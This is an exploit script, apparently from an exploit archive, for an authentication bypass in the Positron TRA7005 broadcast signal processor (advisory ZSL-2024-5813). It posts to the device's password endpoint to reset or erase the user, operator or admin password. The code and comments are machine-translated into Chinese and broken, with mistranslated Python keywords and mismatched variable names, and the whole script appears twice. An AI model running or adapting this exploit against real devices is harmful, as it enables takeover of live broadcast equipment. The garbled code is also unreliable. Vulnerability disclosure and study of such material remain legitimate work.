#利用标题:正电子广播信号处理器TRA7005 v1.20-身份验证旁路
#作者:液体虫
#vendor:正电子SRL
#产品网页: https://www.positron.it
#https://www.positron.it/prodotti/apparati-badoccast/stereo-multicorder/tra-7005/
#受影响的版本: 1.20
#TRA7K5_REV107
#tra7k5_rev106
#tra7k5_rev104
#TRA7K5_REV102
#
#摘要: TRA7000系列是一组专门用于广播的产品,旨在
#保证在符合当前法规和
#用于单个广播公司或无线电网络。 TRA7000系列中的所有型号
#是完全数字的,仅使用高质量的组件,例如24位A/D和D/A转换器
#和32位DSP。 TRA7005执行立体声编码器,RDS编码器,5输出的功能
#MPX分销商,AGC(可调节),用于模拟和数字音频输入,快船
#对于模拟和数字音频输入,任何在任何情况之间的更改紧急切换
#带有可调节阈值和干预时间的输入,都在开关阶段
#辅助源以及回到主要源的返回阶段。以太网连接
#使用Web-Server(可选)用于设备的全部控制和管理。高级旁路
#MPX输入和输出之间的系统,活动和电源异常和电源异常以及
#也可以远程激活。
#
#desc:正电子广播数字信号处理器TRA7005遭受身份验证
#绕过直接且未授权访问密码管理功能。
#该漏洞允许攻击者通过操纵该验证
#密码端点_passwd.html及其有效载荷数据以将用户的密码设置为任意
#值或完全删除它。这将授予未经授权的访问保护区(/用户,
# /运营商, /admin),不需要有效的凭据,妥协
#设备的系统安全性。
#
#测试在:正电子网络服务器
#
#
#由gjoko'liquidworm'Krstic发现的脆弱性
#@zeroscience
#
#
#咨询ID: ZSL-2024-5813
#咨询url: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5813.php
#
#
#22.03.2024
#
#
进口请求,系统
打印(''''
_______________________________________________
┏┳┓•┏┓┏┓┓•
┃┓┓┏┓┏┃┏┓┏┏┓┏┏┓┏┏┓┏┓┏┓┏┓┏┓┏┓┏┓┏┓╋
┻┗┛┗┗┫
┛┛
为了
正电子数字信号处理器
ZSL-2024-5813
_______________________________________________
''))
如果Len(sys.argv)!=4:
print('USAGE: Python positron.py ip: port user/oper/admin/admin erase/new_pwd')
sys.exit(1)
ip=sys.argv [1]
ut=sys.argv [2]
wa=sys.argv [3]
有效_UT=['用户','oper','admin']
如果未在有效的_ut:中使用ut.lower()
打印(“无效的用户类型!使用“用户”,“操作”或“ admin”。)
sys.exit(1)
url=f'http://{ip}/_ passwd.html'
did=f'http://{ip}/_ device.html'
TRY:
r=requests.get(dod)
如果r.status_code==200和r.text:中的'tra7k5'
打印(“找到脆弱的处理器!”)
其他:
打印(“不脆弱或不适用。利用退出。”)
sys.exit(1)
除了requests.exceptions.requestexception为e:
打印(f'Error检查设备: {e}')
sys.exit(1)
标题={
'content-type':'应用程序/x-www-form-urlencoded',
'Accept-Language':'MK-MK,en; q=0.6',
'接受编码:'gzip,deflate',
“用户代理” :'R-marina/11.9',
'接受':'/'
}
有效载荷={}
如果wa.lower()=='erase':
有效载荷[f'psw_ {ut.capitalize()}']='none'
其他:
payload_key=f'psw_ {ut.capitalize()}'
有效载荷[PAYLOAD_KEY]=WA
#print(有效载荷)
r=requests.post(url,标头=标题,data=有效载荷)
打印(r.status_code)
印刷(R.Text)
#作者:液体虫
#vendor:正电子SRL
#产品网页: https://www.positron.it
#https://www.positron.it/prodotti/apparati-badoccast/stereo-multicorder/tra-7005/
#受影响的版本: 1.20
#TRA7K5_REV107
#tra7k5_rev106
#tra7k5_rev104
#TRA7K5_REV102
#
#摘要: TRA7000系列是一组专门用于广播的产品,旨在
#保证在符合当前法规和
#用于单个广播公司或无线电网络。 TRA7000系列中的所有型号
#是完全数字的,仅使用高质量的组件,例如24位A/D和D/A转换器
#和32位DSP。 TRA7005执行立体声编码器,RDS编码器,5输出的功能
#MPX分销商,AGC(可调节),用于模拟和数字音频输入,快船
#对于模拟和数字音频输入,任何在任何情况之间的更改紧急切换
#带有可调节阈值和干预时间的输入,都在开关阶段
#辅助源以及回到主要源的返回阶段。以太网连接
#使用Web-Server(可选)用于设备的全部控制和管理。高级旁路
#MPX输入和输出之间的系统,活动和电源异常和电源异常以及
#也可以远程激活。
#
#desc:正电子广播数字信号处理器TRA7005遭受身份验证
#绕过直接且未授权访问密码管理功能。
#该漏洞允许攻击者通过操纵该验证
#密码端点_passwd.html及其有效载荷数据以将用户的密码设置为任意
#值或完全删除它。这将授予未经授权的访问保护区(/用户,
# /运营商, /admin),不需要有效的凭据,妥协
#设备的系统安全性。
#
#测试在:正电子网络服务器
#
#
#由gjoko'liquidworm'Krstic发现的脆弱性
#@zeroscience
#
#
#咨询ID: ZSL-2024-5813
#咨询url: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5813.php
#
#
#22.03.2024
#
#
进口请求,系统
打印(''''
_______________________________________________
┏┳┓•┏┓┏┓┓•
┃┓┓┏┓┏┃┏┓┏┏┓┏┏┓┏┏┓┏┓┏┓┏┓┏┓┏┓┏┓┏┓╋
┻┗┛┗┗┫
┛┛
为了
正电子数字信号处理器
ZSL-2024-5813
_______________________________________________
''))
如果Len(sys.argv)!=4:
print('USAGE: Python positron.py ip: port user/oper/admin/admin erase/new_pwd')
sys.exit(1)
ip=sys.argv [1]
ut=sys.argv [2]
wa=sys.argv [3]
有效_UT=['用户','oper','admin']
如果未在有效的_ut:中使用ut.lower()
打印(“无效的用户类型!使用“用户”,“操作”或“ admin”。)
sys.exit(1)
url=f'http://{ip}/_ passwd.html'
did=f'http://{ip}/_ device.html'
TRY:
r=requests.get(dod)
如果r.status_code==200和r.text:中的'tra7k5'
打印(“找到脆弱的处理器!”)
其他:
打印(“不脆弱或不适用。利用退出。”)
sys.exit(1)
除了requests.exceptions.requestexception为e:
打印(f'Error检查设备: {e}')
sys.exit(1)
标题={
'content-type':'应用程序/x-www-form-urlencoded',
'Accept-Language':'MK-MK,en; q=0.6',
'接受编码:'gzip,deflate',
“用户代理” :'R-marina/11.9',
'接受':'/'
}
有效载荷={}
如果wa.lower()=='erase':
有效载荷[f'psw_ {ut.capitalize()}']='none'
其他:
payload_key=f'psw_ {ut.capitalize()}'
有效载荷[PAYLOAD_KEY]=WA
#print(有效载荷)
r=requests.post(url,标头=标题,data=有效载荷)
打印(r.status_code)
印刷(R.Text)